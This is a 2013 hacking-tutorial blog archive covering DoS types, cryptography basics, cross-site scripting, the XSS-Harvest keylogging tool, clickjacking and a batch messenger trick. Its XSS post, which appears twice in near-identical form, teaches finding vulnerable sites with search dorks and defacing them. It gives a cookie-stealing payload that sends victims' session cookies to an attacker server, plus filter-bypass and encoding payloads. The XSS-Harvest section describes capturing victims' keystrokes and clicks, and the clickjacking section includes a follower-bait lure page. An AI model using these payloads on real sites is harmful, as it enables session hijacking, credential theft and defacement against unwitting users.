Ads 468x60px

Saturday, 13 July 2013

DOS Attacks

Denial of service (DOS) attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols.

Types:
Teardrop attack is type of attack where fragmented packets are forged to overlap each other when the receiving host tries to reassemble them.

Ping of death type of DoS attack in which the attacker sends a ping request that is larger than 65,536 bytes, which is the maximum size that IP allows. While a ping larger than 65,536 bytes is too large to fit in one packet that can be transmitted, TCP/IP allows a packet to be fragmented, essentially splitting the packet into smaller segments that are eventually reassembled. Attacks took advantage of this flaw by fragmenting packets that when received would total more than the allowed number of bytes and would effectively cause a buffer overload on the operating system at the receiving end, crashing the system. Ping of death attacks are rare today as most operating systems have been fixed to prevent this type of attack from occurring.  

DDOS Attack: A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. This is the result of multiple compromised systems (for example a botnet) flooding the targeted system(s) with traffic. When a server is overloaded with connections, new connections can no longer be accepted.


Peer to Peer Attack Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a "puppet master," instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. As a result, several thousand computers may aggressively try to connect to a target website. While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a large-scale attack) means that this type of attack can overwhelm mitigation defenses.


For all known DOS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks.


Phlashing-PDOS

A permanent Denial Of Service (PDOS), also known as "Phlashing". It's an attack that damages a system so badly that it requires replacement or reinstallation of hardware. Phlashing used for hardware attack. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim's hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device's firmware with a modified, corrupt, or defective firmware image a process which when done legitimately is known as flashing. This therefore "bricks" the device, rendering it unusable for its original purpose until it can be repaired or replaced.

The PDOS is a pure hardware targeted attack which can be much faster and requires fewer resources than using a botnet in a DDoS attack. Because of these features, and the potential and high probability of security exploits on Network Enabled Embedded Devices (NEEDs), this technique has come to the attention of numerous hacker communities. PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard's Systems Security Lab) used to detect and demonstrate PDoS vulnerabilities at the 2008 EUSecWest Applied Security Conference in London. Smith said remotely abusing firmware update mechanisms with a Phlashing attack, for instance, is basically a one-shot attack. “Phlashing attacks can achieve the goal of disrupting service without ongoing expense to the attacker; once the firmware has been corrupted, no further action is required for the DOS condition to continue,”

An attacker could use remote firmware update paths in network hardware, which are often left unprotected, to deliver corrupted firmware and flash this to the device. As a result, the device would become unusable. 

Friday, 12 July 2013

Cryptography

By definition cryptography is the process of converting recognizable data into an encrypted code for transmitting it over a network (either trusted or untrusted). Data is encrypted at the source, i.e. sender's end and decrypted at the destination, i.e. receiver's end.

In all cases, the initial unencrypted data is referred to as plain text. It is encrypted into cipher text, which will in turn (usually) be decrypted into usable plaintext using different encryption algorithms.


                                                                               Plaintext =>Ciphertext=> Plaintext=>Encryption=> Decryption

The Purpose :-
* Authentication : The process of proving one's identity.
* Privacy/confidentiality : Ensuring that no one can read the message except the intended receiver.
* Integrity : Assuring the receiver that the received message has not been altered in any way from the original.
* Non-repudiation : A mechanism to prove that the sender really sent this message.

In general cryptographic algorithms are classified into three categories as follows :

1) Secret Key Cryptography (SKC) : Uses a single key for both encryption and decryption.
2) Public Key Cryptography (PKC) : Uses one key for encryption and another for decryption.
3) Hash Functions : Uses a mathematical transformation to irreversibly "encrypt" information.

Secret Key Cryptography :-
With secret key cryptography, a single key is used for both encryption and decryption. Because a single key is used for both functions, secret key cryptography is also called symmetric encryption.

Secret key cryptography algorithms that are in use today include :

1) Data Encryption Standard (DES) : DES is a block-cipher employing a 56-bit key that operates on 64-bit blocks. DES uses a key of only 56 bits, and thus it is now susceptible to "brute force" attacks.
Triple-DES (3DES) and DESX are the two important variants that strengthen DES.

2) Advanced Encryption Standard (AES ) : The algorithm can use a variable block length and key length; the latest specification allowed any combination of keys lengths of 128, 192, or 256 bits and blocks of length 128, 192, or 256 bits.

3 ) International Data Encryption Algorithm (IDEA) : Secret-key cryptosystem written by Xuejia Lai and James Massey, in 1992 and patented by Ascom; a 64-bit SKC block cipher using a 128-bit key. Also available internationally.

4) Rivest Ciphers : Named for Ron Rivest, a series of SKC algorithms.

RC1 : Designed on paper but never implemented.
RC2 : A 64-bit block cipher using variable-sized keys designed to replace DES. It's code has not been made public although many companies have licensed RC2 for use in their products. Described in RFC 2268.
RC3 : Found to be breakable during development.
RC4 : A stream cipher using variable-sized keys; it is widely used in commercial cryptography products, although it can only be exported using keys that are 40 bits or less in length.
RC5 : A block-cipher supporting a variety of block sizes, key sizes, and number of encryption passes over the data. Described in RFC 2040.
RC6 : An improvement over RC5, RC6 was one of the AES Round 2 algorithms.

5) Blowfish : A symmetric 64-bit block cipher invented by Bruce Schneier; optimized for 32-bit processors with large data caches, it is significantly faster than DES on a Pentium/PowerPC-class machine. Key lengths can vary from 32 to 448 bits in length. Blowfish, available freely and intended as a substitute for DES or IDEA, is in use in over 80 products.

Public-Key Cryptography :-
Generic PKC employs two keys that are mathematically related although knowledge of one key does not allow someone to easily determine the other key. One key is used to encrypt the plaintext and the other key is used to decrypt the ciphertext. No matter which key is applied first, but both the keys are required for the process to work. Because a pair of keys are required, this approach is also called asymmetric cryptography.
In PKC, one of the keys is designated the public key and may be advertised as widely as the owner wants. The other key is designated the private key and is never revealed to another party.

Public-key cryptography algorithms that are in use today for key exchange or digital signatures include :

1) RSA : One of the most popular encryption algorithm, invented in 1977 by three MIT scientists (Ronald Rivest, Adi Shamir, and Leonard Adleman)
The key-pair is derived from a very large number, n, that is the product of two prime numbers chosen according to special rules; these primes may be 100 or more digits in length each, yielding an n with roughly twice as many digits as the prime factors. The public key information includes n and a derivative of one of the factors of n; an attacker cannot determine the prime factors of n (and, therefore, the private key) from this information alone and that is what makes the RSA algorithm so secure.

Hash Functions :-
Hash functions, also called message digests and one-way encryption, are algorithms that, in some sense, use no key. Instead, a fixed-length hash value is computed based upon the plaintext that makes it impossible for either the contents or length of the plaintext to be recovered. Hash algorithms are typically used to provide a digital fingerprint of a file's contents, often used to ensure that the file has not been altered by an intruder or virus. Hash functions are also commonly employed by many operating systems to encrypt passwords. Hash functions, then, provide a measure of the integrity of a file.
Hash algorithms that are in common use today include:
1) Message Digest (MD) algorithms : A series of byte-oriented algorithms that produce a 128-bit hash value from an arbitrary-length message.
MD2 : Designed for systems with limited memory, such as smart cards.
MD4 : Developed by Rivest, similar to MD2 but designed specifically for fast processing in software.
MD5 : Also developed by Rivest in 1991 after potential weaknesses were reported in MD4; this scheme is similar to MD4 but is slower because more manipulation is made to the original data.It accepts variable length message from the user and converts it into a fixed 128-bit message digest value.
One interesting and important aspect of the MD5 hash function is that it is a one way algorithm. This means you can produce the 128-bit fingerprint if the data chunk is available to you. You cannot, however, generate the entire data if only the fingerprint of the data is known.

2) Secure Hash Algorithm (SHA) : Algorithm for NIST's Secure Hash Standard (SHS). SHA-1 produces a 160-bit hash value and was originally published as FIPS 180-1 and RFC 3174. FIPS 180-2 describes five algorithms in the SHS: SHA-1 plus SHA-224, SHA-256, SHA-384, and SHA-512 which can produce hash values that are 224, 256, 384, or 512 bits in length, respectively. SHA-224, -256, -384, and -52 are also described in RFC 4634.

3) RIPEMD : A series of message digests that initially came from the RIPE (RACE Integrity Primitives Evaluation) project. RIPEMD-160 was designed by Hans Dobbertin, Antoon Bosselaers, and Bart Preneel, and optimized for 32-bit processors to replace the then-current 128-bit hash functions. Other versions include RIPEMD-256, RIPEMD-320, and RIPEMD-128.

4) HAVAL (HAsh of VAriable Length) : Designed by Y. Zheng, J. Pieprzyk and J. Seberry, a hash algorithm with many levels of security. HAVAL can create hash values that are 128, 160, 192, 224, or 256 bits in length.

5) Whirlpool : A relatively new hash function, designed by V. Rijmen and P.S.L.M. Barreto. Whirlpool operates on messages less than 2256 bits in length, and produces a message digest of 512 bits. The design of this hash function is very different than that of MD5 and SHA-1, making it immune to the same attacks as on those hashes.

6) Tiger : Designed by Ross Anderson and Eli Biham, Tiger is designed to be secure, run efficiently on 64-bit processors, and easily replace MD4, MD5, SHA and SHA-1 in other applications. Tiger/192 produces a 192-bit output and is compatible with 64-bit architectures; Tiger/128 and Tiger/160 produce the first 128 and 160 bits, respectively, to provide compatibility with the other hash functions.

Cross Site Scripting (XSS)





 
'XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerability found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply  "phishing" on falls users.
This technique is also used for website Hacking.

Types of XSS
There are actually three types of Cross-Site Scripting, commonly named as:
- DOM-Based XSS
- Non-persistent XSS
- Persistent XSS


DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
 - The attacker creates a well builded malicious website
 - The ingenuous user opens that site
 - The user has a vulnerable page on his machine
 - The attacker's website sends commands to the vulnerable HTML page
 - The vulnerable local page execute that commands with the user's privileges
  on that machine.
 - The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website
is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn't need to
 provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbooks". Usually the users uses
that kind of tool to leave messages to the owned
of the website and at a first look it doesn't seems something dangerous, but if an
attacker discover that the system is vulnerable can insert some malicious code in his
 message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any
check on the content of the inserted message: it just inserts the data provided from
the user into the result page.


How to Find XSS Vulnerabilities:-


To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS
Well now lets start learning some Actual Methods, the most common used XSS
injection is :

<script>alert("Priyanshu")</script>

now this will alert a popup message, saying "Priyanshu" without quotes.

So,use "search.php?q=" and you can simple try the following on a website with the
 same thing,

http://website.com/search.php?q=<script>alert("Priyanshu")</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.

Example:


How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing i will mention some of the best and most used, the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another
method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>

There are many others ways that you can found using Google or other website. Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make cookie logger from here:
How To Make A Cookie Stealer Php script ?

ok now you have it save it has a .php file and upload to your server, remember to
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


or


document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


How to Bypass Filtration ?

Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is

')alert('xss');


or


");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
 its bad practice to use alert("XSS") to test for XSS, because some sites block the
keyword "XSS" before so we using "Priyanshu".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz<script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000xyz</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://virus.js'</script>


Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here

http://www.asciitable.com/
http://easycalculation.com/

This will help you write what you want, In my examples ill be writing "HOC" this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>

For More Script Coding Of XSS Visit
http://ha.ckers.org/xss.html
                 

Source:http://ha.ckers.org

in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply  "phishing" on falls users.
This technique is also used for website Hacking.

Types of XSS
There are actually three types of Cross-Site Scripting, commonly named as:
- DOM-Based XSS
- Non-persistent XSS
- Persistent XSS


DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
 - The attacker creates a well builded malicious website
 - The ingenuous user opens that site
 - The user has a vulnerable page on his machine
 - The attacker's website sends commands to the vulnerable HTML page
 - The vulnerable local page execute that commands with the user's privileges
  on that machine.
 - The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website
is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn't need to
 provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbooks". Usually the users uses
that kind of tool to leave messages to the owned
of the website and at a first look it doesn't seems something dangerous, but if an
attacker discover that the system is vulnerable can insert some malicious code in his
 message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any
check on the content of the inserted message: it just inserts the data provided from
the user into the result page.


How to Find XSS Vulnerabilities:-


To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS
Well now lets start learning some Actual Methods, the most common used XSS
injection is :

<script>alert("Priyanshu")</script>

now this will alert a popup message, saying "Priyanshu" without quotes.

So,use "search.php?q=" and you can simple try the following on a website with the
 same thing,

http://website.com/search.php?q=<script>alert("Priyanshu")</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.

Example:


How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing i will mention some of the best and most used, the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another
method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>

There are many others ways that you can found using Google or other website. Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make cookie logger from here:
How To Make A Cookie Stealer Php script ?

ok now you have it save it has a .php file and upload to your server, remember to
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


or


document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


How to Bypass Filtration ?

Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is

')alert('xss');


or


");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
 its bad practice to use alert("XSS") to test for XSS, because some sites block the
keyword "XSS" before so we using "Priyanshu".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz<script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000xyz</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://virus.js'</script>


Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here

http://www.asciitable.com/
http://easycalculation.com/

This will help you write what you want, In my examples ill be writing "HOC" this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>

For More Script Coding Of XSS Visit
http://ha.ckers.org/xss.html
                 

Source:http://ha.ckers.org

   XSS-Harvest:-

 Harvesting Cross Site Scripting, Clicks, Keystrokes and Cookies


Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affect domain, regardless of whether or not the vulnerability is “reflected” or “persistent”.XSS-Harvest is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.


  Functionality of xss-harvest:


    * Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks)     to the vulnerable page and sets up communication with the XSS-Harvest server.
    * Any key entered will be sent covertly to the server.
    * Any mouse click performed will be analysed and the data covertly sent to the server.
    * Optionally ‘redress’ the vulnerable page to display a different page on the same subdomain – e.g. a login form.
    * If redressing the victim’s browser, allow subsequently loaded pages to be also ‘infected’ – assuming they don’t break the same-origin policy (i.e. they’re on the same subdomain).
    * Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
    * Each victim has a separate history file containing all events, cookies and keystrokes.
    * Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid confusion).
    * Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
    * Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.

How to Exploit XSS with XSS-Harvest
Identify a page vulnerable to XSS (reflected or persistent will be fine – unless the victim is running IE9 or another plugin such as NoScript).

Understand the markup of the page. You should be looking to insert syntactically correct <script></script> tags in to the source of the vulnerable page. Most attackers will insert something like ‘<script>alert(1)</script>’ at this stage to ensure the page is actually vulnerable.

Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.

Insert the following ‘injection string’ into the vulnerable page:
<script src=”>

This will return the client-side JavaScript to the victim, indicated by the ‘i’ in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in – a new history file will be created for each new victim.
To use of the redress function, start the server with the -r parameter:

./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

Basic dependencies:
HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork

Download XSS-Harvest

Computer Forensic Tools And Tricks

To Find The USB Logs

Go to Run Then Enter Code _|
For window 7
-->
C:\Windows\inf\setupapi.dev.log

For window Xp
-->
C:\Windows\inf\setupapi.log
For Ram Analysis

Open Source Tools from ForensicZone

Download Link

Clickjacking

What is Clickjacking:

Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable.
when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top
level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. It may be similar to CSRF Cross Site Request Forgeries Attack. 


Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in
2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.


Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they
are typing in the password to their email or bank account, but are instead typing into
an invisible frame controlled by the attacker.


At present this attack mostly use on social network websites like Facebook and twitter, Because this attack is used by convinced victim for click on the link and SocialNetwork website might be very useful for attack on victim.

One famous example of clickjacking is Facebook.


Code:

 <style>
 iframe { /* iframe from facebook.com */
  width:300px;
  height:100px;
  position:absolute;
  top:0; left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>

<div>Click on the link to get more followers:</div>
   
<iframe src="/files/tutorial/window/clicktarget.html"></iframe>

<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be get 10000 followers..!!</div>

Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!


Download
ClickJacking Tool


For Defence:
Clickjacking Protection



For more information:
OWASP

Chat with Friends through Command Prompt

Hello friends Now U Can Chat With Command Prompt THrough So Here IS A Trick.....

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:


 
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
 


8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

DONE....ENJOY.~!!
 

Adf.ly


SociBuzz

EasyHits4U

The Most Popular Traffic Exchange

URLcash